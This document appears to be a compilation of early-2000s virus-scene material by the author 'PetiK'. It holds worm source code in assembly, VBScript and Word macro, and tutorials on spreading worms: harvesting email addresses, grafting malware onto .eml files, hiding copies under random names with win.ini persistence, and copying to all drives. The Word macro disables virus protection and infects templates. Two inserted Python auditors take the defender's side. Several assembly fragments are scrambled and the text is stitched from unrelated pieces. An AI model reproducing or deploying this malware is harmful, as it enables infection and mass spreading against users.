'document.write "<font>Please accept the ActiveX to see this HTML wallpaper !' db '<br><a href =''javascript:location.reload()''>CLICK HERE</a> to reload and ' db 'click yes</font>"',CRLF db 'else',CRLF db 'document.write "<font>Click on the Windows logo to download the new patch.' db '<br>This patch correct the bug about the IIS and MIME.<br><br></font>"',CRLF db 'document.write "<font>(You must be connected tp inet !!)</font>"',CRLF db 'end if',CRLF db '</script>',CRLF db '</HTML>',CRLF e_htm:

signature author end start end

db "I-Worm.Dandelion " db "Coded by PetiK - 2001",00h

'VBS.GoodBye Written in France. 'My last Worm. I say Good Bye On Error Resume Next dim w,f,win,sys,file Set w=CreateObject("WScript.Shell") Set fso=CreateObject("Scripting.FileSystemObject") Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set tmp=fso.GetSpecialFolder(2) Set wo=fso.GetFile(WScript.ScriptFullName) If wo <> (sys&"\Cmmon32.vbs") Then MsgBox "Look at this new Game",vbinformation,"New Game For You" img="4D5A50000200000004000F00FFFF0000.." lire=decr(img) Set pic=fso.CreateTextFile(win&"\New_Prog.exe",true) pic.Write lire pic.Close 'w.Run win&"\New_Prog.exe",1,false MsgBox "Script : "&wo&vbCrLf&"Error : Cannot read this script"&vbCrLf&"Code : 800A000D",vbcritical,"Windows Script Host" End If If not fso.FolderExists(sys&"\Plg_PTK") Then fso.CreateFolder(sys&"\Plg_PTK") End If x=0 do while x<100 a=x extension wo.Copy(sys&"\Plg_PTK\Save"&a&crext) x=x+1 loop wo.Copy(sys&"\Cmmon32.vbs") wo.Copy(sys&"\Plg_PTK\Important.vbs") run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32") w.RegWrite run,("wscript "&sys&"\Cmmon32.vbs") If Day(Now)=11 and Month(Now)=9 Then w.RegDelete ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32") End If cache=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") desktop=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop") personal=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal") progfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") commonfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\CommonFilesDir") Mail(win) Mail(sys) Mail(tmp) Mail(cache) Mail(desktop) Mail(personal) Mail(progfile) Mail(commonfile) WormM "" Function extension text="ComExeBatDocXlsPptTifBmpJpgGifHtmHttMp3WavMid" randomize (timer) tfile=int(rnd(1)*14)+1 crext="."& mid(text,((tfile-1)*3)+1,3) crext=crext&".vbs" End Function Function decr(octet) For hexa=1 To 
Len(octet) Step 2 decr=decr & Chr("&h" & Mid(octet, hexa, 2)) Next

End Function Function WormM(dir) If Dir = "" Then If fso.FileExists("C:\mirc\mirc.ini") then dir="C:\mirc If fso.FileExists("C:\mirc32\mirc.ini") then dir="C:\mirc32 If fso.FileExists(pogfile&"\mirc\mirc.ini") then dir=pogfile&"\mirc\mirc.ini" If fso.FileExists(pogfile&"\mirc32\mirc.ini") then dir=pogfile&"\mirc32\mirc.ini" End If If dir <> "" Then Set mirc=fso.CreateTextFile(dir&"\script.ini", True) mirc.WriteLine "[scipt]" mirc.WriteLine "n0=ON 1:JOIN:#:{ ( $nick == $me ) { halt }" mirc.WriteLine "n1 = /dcc send $nick " &sys&"\Plg_PTK\Important.vbs" mirc.WriteLine "n2=}" mirc.Close End If End Function

Function Mail(dossier) If not fso.FileExists(sys&"\Plg_PTK\Info.txt") Then Set DF=fso.CreateTextFile(sys&"\Plg_PTK\Info.txt") DF.WriteLine "Files Found By VBS.GoodBye.Worm :" DF.WriteBlankLines(1) DF.Close End If If fso.FolderExists(dossier) Then For Each File in fso.GetFolder(dossier).Files ext=fso.GetExtensionName(File.Name) If (ext="htm") or (ext="html") or (ext="php") or (ext="htt") Then Set see = fso.OpenTextFile(File.path, 1) liretout = see.ReadAll For i = 1 to len(liretout) mailto = mid(liretout,i,7) If mailto = "mailto:" Then msgbox mailto,vbinformation,File.path Exit For else End If Next see.Close Set DF = fso.OpenTextFile(sys&"\Plg_PTK\Info.txt", 8, True) DF.WriteLine date& " " &time& " => " &File.path DF.Close End If Next End If End Function

INFO.TXT
Files Found By VBS.GoodBye.Worm :


'VBS.Cachemire 'On error resume next fs="FileSystemObject" sc="Scripting" wsc="WScript" sh="Shell" crlf=Chr(13)&Chr(10) Set fso=CreateObject(sc & "." & fs) Set ws=CreateObject(wsc & "." & sh) Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set tmp=fso.GetSpecialFolder(2) desk=ws.SpecialFolders("Desktop") strp=ws.SpecialFolders("StartUp") Set fl=fso.OpenTextFile(WScript.ScriptFullName,1) wrm=fl.ReadAll fl.Close If WScript.ScriptFullName <> sys&"\MsBackup.vbs" Then MsgBox "Sorry but the file """ & WScript.ScriptName & """ is not a valid VBS file",vbcritical,"ALERT" 'fso.GetFile(WScript.ScriptFullName).Copy(sys&"\MsBackup.vbs") 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MsBackup",sys&"\MsBackup.vbs" Else End If

comment $ Name : I-Worm.Lauli Author : PetiK Date : 7th June 2002 $ .586p .model flat .code JUMPS api endm include useful.inc st_worm:push 50 mov esi,offset org_wrm push esi push 0 api GetModuleFileNameA mov push push push api add mov stosd mov stosd mov stosd pop ;cop: ; ; ; ;reg: ; ; ; ; ; ; push push push api edi,offset cpy_wrm edi 50 edi GetSystemDirectoryA edi,eax eax,"WsM\" eax,"kcos" eax,"exe." edi 0 edi esi CopyFileA macro a extrn a:proc call a

push 50 push edi push 1 @pushsz "Wsock32" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA push 0 push 80h push 3 push 0 push 1 push 80000000h @pushsz "code.txt" inc eax je end_cr_vbs dec eax xchg eax,ebx xor push push push push push push api test je xchg push

;push offset org_wrm

eax,eax eax eax eax 2 eax ebx CreateFileMappingA eax,eax end_vbs1 eax,ebp 40h

@pushsz "OK" @pushsz "OK" push 0 api MessageBoxA xor push push push push push api test je push push api mov eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax end_vbs2 0 ebx GetFileSize [size],eax

chk_byte: mov edi,offset hex push edi p_c: lodsb call convert stosb dec size cmp size,0 jnz p_c pop edi push 40h @pushsz "Hex String:" push edi push 0 api MessageBoxA end_vbs3: push esi api UnmapViewOfFile end_vbs2: push ebp api CloseHandle end_vbs1: push ebx api CloseHandle end_cr_vbs: end_worm: push api 0 ExitProcess

convert: push ecx push edi xor ecx,ecx mov cl,al push ecx shr cl,4 lea edi,hex_table inc cl @@y: inc edi dec cl jnz @@y dec edi mov al, byte ptr [edi] pop ecx and cl,0Fh lea edi,hex_table inc cl @@x: inc edi dec cl jnz @@x dec edi mov ah,byte ptr [edi] pop edi

pop ret .data cpy_wrm org_wrm size hex_table hex end st_worm end

ecx

db 50 dup (0) db 50 dup (0) dd ? db "012345789ABCDEF",0 db 5000 dup (?)

Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long

Sub AutoOpen()
    Call FuckProtection
    Call InfectWord
    Call CreateEML
End Sub

Sub InfectWord()
    On Error Resume Next
    Set nor = NormalTemplate.VBProject.VBComponents
    Set doc = ActiveDocument.VBProject.VBComponents
    srcvir = "C:\calli.drv"
    If nor.Item("Calli").Name <> "Calli" Then
        doc("Calli").Export srcvir
        nor.Import srcvir
    End If
    If doc.Item("Calli").Name <> "Calli" Then
        nor("Calli").Export srcvir
        doc.Import srcvir
        ActiveDocument.Save
    End If
    Kill (srcvir)
End Sub

Sub FuckProtection()
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    Select Case Application.Version
        Case "10.0"
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
        Case "9.0"
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    End Select
    WordBasic.DisableAutoMacros 0
End Sub

Sub CreateEML()
    Dim strUserName As String
    strUserName = String(100, Chr$(0))
    GetUserName strUserName, 100
    strUserName = Left$(strUserName, InStr(strUserName, Chr$(0)) - 1)
    bound = ""
    For i = 1 To 17
        Randomize (Timer)
        bound = bound + Chr(Int(Rnd(1) * 8) + 48)
    Next
    eml1 = "To: """ & strUserName & "@microsoft.com""" & vbCrLf & _
           "Subject: Hello You..." & vbCrLf & _
           "Date: " & Hour(Now) & ":" & Minute(Now) & ":" & Second(Now) & " +0200" & vbCrLf & _
           "MIME-Version: 1.0" & vbCrLf & _
           "Content-Type: multipart/mixed;" & vbCrLf & _
           vbTab & "boundary = ""----=_NextPart_" & bound & """" & vbCrLf & _
           "X-Priority: 3" & vbCrLf & _
           "X -MSMail - Priority: Normal" & vbCrLf & _
           "X-Unsent: 1" & vbCrLf & _
           "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000" & vbCrLf & vbCrLf & _
           "This is a multi-part message in MIME format." & vbCrLf & vbCrLf
    eml2 = "------=_NextPart_" & bound & vbCrLf & _
           "Content-Type: text/plain;" & vbCrLf & _
           vbTab & "Charset=""iso-8859-1""" & vbCrLf & _
           "Content-Transfer-Encoding: 7bit" & vbCrLf & vbCrLf & _
           "Hello my friend, this is a funny file for you" & vbCrLf & vbCrLf & _
           vbTab & vbTab & "Best Regards" & vbCrLf & vbCrLf & vbCrLf
    eml3 = "------=_NextPart_" & bound & vbCrLf & _
           "Content-Type: application/x-msdownload;" & vbCrLf & _
           vbTab & "name = ""Only_For_You.doc""" & vbCrLf & _
           "Content -Transfer - Encoding: base64" & vbCrLf & _
           "Content-Disposition: attachment;" & vbCrLf & _
           vbTab & "fileName = ""Only_For_You.doc""" & vbCrLf & vbCrLf
    eml4 = EncodeBase64(ActiveDocument.FullName)
    eml5 = vbCrLf & "------=_NextPart_" & bound
    Open "hello.eml" For Output As #1
    Print #1, eml1 & eml2 & eml3 & eml4 & eml5
    Close #1
End Sub

Private Function EncodeBase64(ByVal vsFullPathname As String) As String
    On Error Resume Next
    Dim b As Integer
    Dim Base64Tab As Variant
    Dim bin(3) As Byte
    Dim s As String
    Dim l As Long
    Dim i As Long
    Dim FileIn As Long
    Dim sResult As String
    Dim n As Long
    Base64Tab = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", _
                      "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", _
                      "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", _
                      "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", _
                      "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")
    Erase bin
    l = 0: i = 0: FileIn = 0: b = 0: s = ""
    FileIn = FreeFile
    Open vsFullPathname For Binary As FileIn
    sResult = s & vbCrLf
    s = ""
    l = LOF(FileIn) - (LOF(FileIn) Mod 3)
    For i = 1 To l Step 3
        Get FileIn, , bin(0)
        Get FileIn, , bin(1)
        Get FileIn, , bin(2)
        If Len(s) > 72 Then
            s = s & vbCrLf
            sResult = sResult & s
            s = ""
        End If
        b = (bin(n) \ 4) And &H3F
        s = s & Base64Tab(b)
        b = ((bin(n) And &H3) * 16) Or ((bin(1) \ 16) And &HF)
        s = s & Base64Tab(b)
        b = ((bin(n + 1) And &HF) * 4) Or ((bin(2) \ 64) And &H3)
        s = s & Base64Tab(b)
        b = bin(n + 2) And &H3F
        s = s & Base64Tab(b)
    Next i
    If Not (LOF(FileIn) Mod 3 = 0) Then
        For i = 1 To (LOF(FileIn) Mod 3)
            Get FileIn, , bin(i - 1)
        Next i
        If (LOF(FileIn) Mod 3) = 2 Then
            b = (bin(0) \ 4) And &H3F
            s = s & Base64Tab(b)
            b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF)
            s = s & Base64Tab(b)
            b = ((bin(1) And &HF) * 4) Or ((bin(2) \ 64) And &H3)
            s = s & Base64Tab(b)
            s = s & "="
        Else
            b = (bin(0) \ 4) And &H3F
            s = s & Base64Tab(b)
            b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF)
            s = s & Base64Tab(b)
            s = s & "=="
        End If
    End If
    If s <> "" Then
        s = s & vbCrLf
        sResult = sResult & s
    End If
    s = ""
    Close FileIn
    EncodeBase64 = sResult
End Function

comment *
Name     : I-Worm.DieWorm
Author   : PetiK
Date     : July 10th 2002
Language : win32asm
*

.586p
.model flat
.code
JUMPS

api     macro a
        extrn a:proc
        call a
        endm

include useful.inc

start:
get_name:
        push 50
        mov esi,offset orgwrm
        push esi
        push 0
        api GetModuleFileNameA

get_copy_name:
        mov edi,offset cpywrm
        push edi
        push 50
        push edi
        api GetWindowsDirectoryA
        add edi,eax
        mov eax,'acs\'
        stosd
        mov eax,'renn'
        stosd
        mov eax,'exe.'
        stosd
        pop edi

copy_worm:
;       push 0
;       push edi
;       push esi
;       api CopyFileA

        push 50
        push edi
        push 1
        @pushsz "ScanW32"
        @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
        push 80000002h
        api SHSetValueA

        push 0
        push 0
        push 3
        push 0
        push 1
        push 80000000h
        push offset orgwrm
        api CreateFileA
        inc eax
        je end_worm
        dec eax
        xchg ebx,eax
        push 0
        push 0
        push 0
        push 2
        push 0
        push ebx
        api CreateFileMappingA
        test eax,eax
        je end_w1
        xchg eax,ebp
        push 0
        push 0
        push 0
        push 4
        push ebp
        api MapViewOfFile
        test eax,eax
        je end_w2
        xchg eax,esi
        push 0
        push ebx
        api GetFileSize
        mov [size],eax

        push 40h
        @pushsz "Hello"
        @pushsz "Hello"
        push 0
        api MessageBoxA

        push 0
        push 80h
        push 2
        push 0
        push 1
        push 40000000h
        @pushsz "essai.txt"
        api CreateFileA
        mov [hvba],eax

@start_hex:
        mov cnt,0
        mov edi,offset dochex
        push edi
        @pushsz "e = e & """
        push offset dochex
        api lstrcat
        pop edi
        push 0
        push offset byte
        push 112
        push offset dochex
        push [hvba]
        api WriteFile
        push [hvba]
        api CloseHandle

f_hex:
end_w3: push esi
        api UnmapViewOfFile
end_w2: push ebp
        api CloseHandle
end_w1: push ebx
        api CloseHandle

end_worm:
        push 0
        api ExitProcess

conv_hex:
        PUSH ECX
        PUSH EDI
        XOR ECX, ECX
        MOV CL, AL
        PUSH ECX
        SHR CL, 04h
        LEA EDI, Tab_Hex
        INC CL
@@Y:    INC EDI
        DEC CL
        JNZ @@Y
        DEC EDI
        MOV AL, BYTE PTR [EDI]
        POP ECX
        AND CL, 0Fh
        LEA EDI, Tab_Hex
        INC CL
@@X:    INC EDI
        DEC CL
        JNZ @@X
        DEC EDI
        MOV AH, BYTE PTR [EDI]
        POP EDI
        POP ECX
        RET

.data
orgwrm  db 50 dup (0)
cpywrm  db 50 dup (0)
dochex  db 112 dup (0)
hfile   dd ?
hvba    dd ?
byte    dd 0
size    dd ?
cnt     dd ?
Tab_Hex db "0123456789ABCDEF", 00h
ends
end start

=== How to spread a worm ? ===
=== by PetiK (09/17/2001) ===

###################
#FIND SOME ADDRESS#
###################

The most difficult part of spreading a worm is finding addresses. A computer holds a lot of files that store addresses.

*.WAB file (Windows AddressBook):
---------------------------------
We can find this sort of file in the default value of HKEY_CURRENT_USER\Software\Microsoft\Wab\WAB4\Wab File Name. Look at the source of Win32.HiV coded by Benny to examine the mechanism. For this sort of file I use another technique: I create a vbs file in C:\. This vbs file searches every e-mail address in the Outlook Address Book and saves them in a file in the WINDOWS or SYSTEM folder. This file is afterwards scanned by the worm (look at the source of I-Worm.Passion or I-Worm.Rush).

*.HTM, *.HTML (Internet files):
-------------------------------
Windows is full of this sort of file, but the problem is that they don't contain many addresses. The solution is to scan all *.HTM and *.HTML files in the MSIE Cache Directory. We can use the API SHGetSpecialFolderPathA in SHELL32.dll (folder 20h). We can use the registry too; the value is HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache.

*.EML file (Outlook Express file):
----------------------------------
We can find addresses in an e-mail that is ready to send. This is the start of an eml file (Outlook Express):

From: "PetiKVX" <petikvx@multimania.com>
To: <victim@multimania.com>                   <= We have our address
Subject: Virus Spread
Date: Sun, 16 Sep 2001 20:54:11 +0200
MIME-Version: 1.0

To take this address, we search for the string "To: <" in *.eml and take the address that follows.

#################
#SPREAD THE WORM#
#################

I have imagined a way to insert a virus/worm/trojan into a mail which already contains an attachment. We're going to use *.eml files again. This is the appearance of an EML file:

From: "PetiKVX" <petikvx@multimania.com>
To: <victim@multimania.com>
Subject: Virus Spread
Date: Sun, 16 Sep 2001 20:54:11 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_0008_01C13EF1.BF420560"    <= The string of the "boundary"

------=_NextPart_001_0009_01C13EF1.BF420560
Content-Type: text/plain;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

This is a new virus                           <= This is the body of mail
                                              <= We can add something (text, script ??)

------=_NextPart_000_0008_01C13EF1.BF420560   <= This is a first attachment
Content-Type: application/x-msdownload;
        name="Winpopup.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="Winpopup.exe"

HGiAAAAAAAaACgAAAAAA5gUNADAcP4AAAAAA8wUFADAcQIAAAAAA+AUzADAcQoAAAAAAKwZpADAc
Q4AAAAAAlAYLADAcRIAAAAAAnwYJADAcvIAAAAAAqAYLADAcFIEAAAAAswYEADAcFYEAAAAAtwYF
ADAcFoEAAAAAvAYDADAcZYAAAAAACYABAAAAAAC/BgMAMAzcgAAAAAAKgAEAAAAAAMIGAQAwHKoB
AAAAABCAAQAAAAAAwwYfADAMAYAAAAAAA4AGAAAAAACMBC8AEBwBgAAAAAC7BBMAEBwCgAAAAADR
------=_NextPart_000_0008_01C13EF1.BF420560   <= Delete "--" at the end of the string
Content-Type: application/x-msdownload;       \
        name="virus.exe"                      |
Content-Transfer-Encoding: base64             |<= This is our virus that we want attached.
Content-Disposition: attachment;              |<= The file is of course encoded with the
        filename="virus.exe"                  |<= base64 system.
                                              |
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu |
MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
                                              /
------=_NextPart_000_0008_01C13EF1.BF420560--

To attach a file this way, we must read the "boundary". Here it is the string "----=_NextPart_000_0008_01C13EF1.BF420560". We must delete the "--" after the last "boundary" before infection; like this the mail will contain the second attachment.

Warning !! We must add "--" before and AFTER the LAST "boundary" to mark the end of the mail.

There we are ! If you have suggestions, please mail me at petikvx@multimania.com. You can visit my website: http://www.petikvx.fr.fm
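The defender's side of the boundary trick above, as an added example that is not part of the original article: walk the MIME tree of an .eml, list every attachment, flag executable ones, and check that nothing was grafted after the closing delimiter. SAMPLE_EML is a constructed message modelled on the one shown (same boundary string, dummy base64 bodies); the attachment names are the article's.

```python
"""Audit an .eml for appended executable parts (added example, not PetiK's code)."""
import email
from email import policy

# MIME types and extensions an executable attachment usually carries.
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-msdos-program",
                    "application/x-executable"}
EXECUTABLE_EXTS = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js")

# Constructed sample: a text part plus two application/x-msdownload attachments,
# the second one appended the way the article describes.
SAMPLE_EML = """\
From: "PetiKVX" <petikvx@multimania.com>
To: <victim@multimania.com>
Subject: Virus Spread
Date: Sun, 16 Sep 2001 20:54:11 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
\tboundary="----=_NextPart_000_0008_01C13EF1.BF420560"

This is a multi-part message in MIME format.

------=_NextPart_000_0008_01C13EF1.BF420560
Content-Type: text/plain;
\tcharset="iso-8859-1"
Content-Transfer-Encoding: 7bit

This is a new virus

------=_NextPart_000_0008_01C13EF1.BF420560
Content-Type: application/x-msdownload;
\tname="Winpopup.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
\tfilename="Winpopup.exe"

QUJDREVGR0g=
------=_NextPart_000_0008_01C13EF1.BF420560
Content-Type: application/x-msdownload;
\tname="virus.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
\tfilename="virus.exe"

QUJDREVGR0g=
------=_NextPart_000_0008_01C13EF1.BF420560--
"""


def list_attachments(msg):
    """[(filename, content_type)] for every leaf part that is an attachment."""
    found = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        fname = part.get_filename()
        if fname is None and part.get_content_disposition() != "attachment":
            continue
        found.append((fname, part.get_content_type()))
    return found


def check_closing_boundary(raw, boundary):
    """RFC 2046: the message ends with '--boundary--', and only an epilogue may
    follow.  A missing delimiter, or data after it, is where a sloppy graft shows."""
    closing = "--" + boundary + "--"
    idx = raw.find(closing)
    if idx < 0:
        return "closing delimiter missing"
    epilogue = raw[idx + len(closing):].strip()
    if epilogue:
        return "%d bytes of data after the closing delimiter" % len(epilogue)
    return None


def audit_eml(raw):
    """Return {'attachments': [...], 'findings': [...]} for the raw .eml text."""
    msg = email.message_from_string(raw, policy=policy.default)
    attachments = list_attachments(msg)
    findings = []
    for fname, ctype in attachments:
        if ctype in EXECUTABLE_TYPES or (fname or "").lower().endswith(EXECUTABLE_EXTS):
            findings.append("executable attachment: %s (%s)" % (fname, ctype))
    boundary = msg.get_boundary()
    if boundary:
        problem = check_closing_boundary(raw, boundary)
        if problem:
            findings.append(problem)
    return {"attachments": attachments, "findings": findings}


if __name__ == "__main__":
    for line in audit_eml(SAMPLE_EML)["findings"]:
        print(line)
```

Two executable attachments on one otherwise ordinary message is exactly the artefact the article's technique leaves behind; a mail gateway rule on that count, plus the closing-delimiter check, covers both the clean and the sloppy variant.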

=== Some Practice Technics ===
=== by PetiK (02/10/2002) ===

###############
#Introduction:#
###############

This article presents some techniques that I use for my worms. I don't code as well as other coderz (Benny, GriYO, Bumblebee, etc...) but I want to show what I know how to do. Each part is accompanied by its source code.

Summary:
I:Hide a copy of worm
II:Spread a worm into different drives
III:Extract API from KERNEL32.DLL library

########################
#I:Hide a copy of worm:#
########################

When I read a new description of a worm, I note that it uses a static name like services.exe (XTC), winmine.exe (Chainsaw), wsock2.dll (Icecubes). It's practical because of the name, but it's practical for deleting the worm too. So my idea was to change the name of the worm at each start. How ?? Easy.

First: create a random name into the %windir% or %sysdir% directory :

        push 50
        mov esi,offset orig_worm
        push esi
        push 0
        api GetModuleFileNameA

        mov edi,offset copy_worm
        push edi
        push 50
        push edi
        api GetSystemDirectoryA
        add edi,eax
        mov al,"\"
        stosb
        api GetTickCount                \
        push 9                          |
        pop ecx                         |
        xor edx,edx                     |
        div ecx                         |
        inc edx                         |
        mov ecx,edx                     |
copy_g: push ecx                        |
        api GetTickCount                |
        push 'z'-'a'                    |
        pop ecx                         |
        xor edx,edx                     |
        div ecx                         >--- Thanx to Benny for this
        xchg eax,edx                    |    Example of random name:
        add al,'a'                      |    jwvv.exe, abgqlbg.exe, slb.exe
        stosb                           |    If we don't sleep the name looks like:
        api GetTickCount                |    ggggggg.exe, hhhhhhhh.exe, uuuuuuu.exe
        push 100                        |
        pop ecx                         |
        xor edx,edx                     |
        div ecx                         |
        push edx                        |
        api Sleep                       |
        pop ecx                         |
        loop copy_g                     |
        mov eax,"exe."                  |
        stosd                           |
        pop edi                         /

Second: Put the original name into Wininit.ini to delete it at the next start:

        @pushsz "C:\WINDOWS\WININIT.INI"        \
        push offset orig_name                   |    [rename]
        @pushsz "NUL"                           >--- NUL=orig_name
        @pushsz "rename"                        |
        api WritePrivateProfileStringA          /

Third: Copy the worm:

        push 0
        push edi                ; copy name
        push esi                ; original name
        api CopyFileA

Fourth: Register the name into Win.ini to activate it at the next start:

        push edi                ; copy name
        @pushsz "RUN"
        @pushsz "WINDOWS"
        api WriteProfileStringA

-----------------------source-----------------------
.586p
.model flat
.code
JUMPS

api     macro a
        extrn a:proc
        call a
        endm

include Useful.inc

start_worm:
        push 50
        mov esi,offset orig_worm
        push esi
        push 0
        api GetModuleFileNameA

        mov edi,offset copy_worm
        push edi
        push 50
        push edi
        api GetSystemDirectoryA
        add edi,eax
        mov al,"\"
        stosb
        api GetTickCount
        push 9
        pop ecx
        xor edx,edx
        div ecx
        inc edx
        mov ecx,edx
copy_g: push ecx
        api GetTickCount
        push 'z'-'a'
        pop ecx
        xor edx,edx
        div ecx
        xchg eax,edx
        add al,'a'
        stosb
        api GetTickCount
        push 100
        pop ecx
        xor edx,edx
        div ecx
        push edx
        api Sleep
        pop ecx
        loop copy_g
        mov eax,"exe."
        stosd
        pop edi
        push 40h
        push offset copy_worm
        push edi
        push 0
        api MessageBoxA

        push 50
        push offset wininit
        api GetWindowsDirectoryA
        @pushsz "\WININIT.INI"
        push offset wininit
        api lstrcat
        push offset wininit
        push esi
        @pushsz "NUL"
        @pushsz "rename"
        api WritePrivateProfileStringA

copy_w: push 0
        push edi
        push esi
        api CopyFileA

run_w:  push edi
        @pushsz "RUN"
        @pushsz "WINDOWS"
        api WriteProfileStringA

end_worm:
        push 0
        api ExitProcess

.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
wininit   db 50 dup (0)

end start_worm
-----------------------source-----------------------
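The two persistence writes in part I leave a trace in plain text files, so an audit can read them back. The following is an added example, not part of the article: a small INI reader that lists the programs win.ini will launch ([windows] run= and load=) and the pending [rename] operations in wininit.ini (a NUL target deletes the source at the next boot), then reports the combination the article describes. WIN_INI and WININIT_INI are constructed sample contents.

```python
"""Audit win.ini / wininit.ini autostart and delete-on-boot entries (added example)."""
import re

# Constructed samples: a run= entry with a random-looking name in the system
# directory and a queued deletion of the original dropper.
WIN_INI = """\
[windows]
load=
run=C:\\WINDOWS\\SYSTEM\\jwvv.exe
NullPort=None
[Desktop]
Wallpaper=(None)
"""

WININIT_INI = """\
[rename]
NUL=C:\\Downloads\\funny.exe
"""

# Names produced by the article's generator: 1 to 9 lowercase letters plus .exe
RANDOM_NAME = re.compile(r"^[a-z]{1,9}\.exe$")


def parse_ini(text):
    """Minimal INI reader returning {section: [(key, value), ...]}.
    Duplicate keys are kept because [rename] repeats NUL= once per file."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()))
    return sections


def win_ini_autostarts(text):
    """Programs started from win.ini: [windows] run= and load=, whose values
    are comma- or whitespace-separated lists.  Returns [(key, path)]."""
    started = []
    for key, value in parse_ini(text).get("windows", []):
        if key.lower() in ("run", "load"):
            for item in re.split(r"[,\s]+", value):
                if item:
                    started.append((key.lower(), item))
    return started


def wininit_renames(text):
    """[rename] operations as (target, source); a NUL target means delete."""
    return [(k.upper() if k.upper() == "NUL" else k, v)
            for k, v in parse_ini(text).get("rename", [])]


def audit(win_ini, wininit_ini):
    """Human-readable findings for both files."""
    findings = []
    for key, path in win_ini_autostarts(win_ini):
        note = "%s= starts %s" % (key, path)
        basename = path.rsplit("\\", 1)[-1].lower()
        if RANDOM_NAME.match(basename):
            note += " (short all-letter name, review)"
        findings.append(note)
    for target, source in wininit_renames(wininit_ini):
        if target == "NUL":
            findings.append("wininit.ini deletes %s at next boot" % source)
    return findings


if __name__ == "__main__":
    for line in audit(WIN_INI, WININIT_INI):
        print(line)
```

Every run=/load= entry deserves a look regardless of its name; the name heuristic only ranks which one to open first.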

########################################
#II:Spread a worm into different drives#
########################################

One copy is good, many copies are better. In fact, we can create a sort of "backup" of the worm on the different drives of the system. It's easy to code this (too easy perhaps).

start_worm:
        push 50
        mov esi,offset orig_worm
        push esi
        push 0
        api GetModuleFileNameA          ; Take the name of the worm

spread_system:
        call @lect
        db "D:\",0                      ; The different drives. We don't
        db "E:\",0                      ; use A,B because it's certainly
        ......                          ; a floppy drive.
        db "Y:\",0
        db "Z:\",0
@lect:  pop esi
        push 23                         ; Number of drives 26-3=23
        pop ecx
loop_lect:
        push ecx
        push esi
        api SetCurrentDirectoryA
;       test eax,eax
;       jnz continue_spread
        push 0
        @pushsz "winbackup.exe"         ; name of copy
        push offset orig_worm
        api CopyFileA
;continue_spread:
        @endsz
        pop ecx
        loop loop_lect
end_spread_system:

-----------------------source-----------------------
.586p
.model flat
.code
JUMPS

api     macro a
        extrn a:proc
        call a
        endm

include Useful.inc

start_worm:
        push 50
        mov esi,offset orig_worm
        push esi
        push 0
        api GetModuleFileNameA

spread_system:
        call @lect
        db "D:\",0
        db "E:\",0
        db "F:\",0
        db "G:\",0
        db "H:\",0
        db "I:\",0
        db "J:\",0
        db "K:\",0
        db "L:\",0
        db "M:\",0
        db "N:\",0
        db "O:\",0
        db "P:\",0
        db "Q:\",0
        db "R:\",0
        db "S:\",0
        db "T:\",0
        db "U:\",0
        db "V:\",0
        db "W:\",0
        db "X:\",0
        db "Y:\",0
        db "Z:\",0
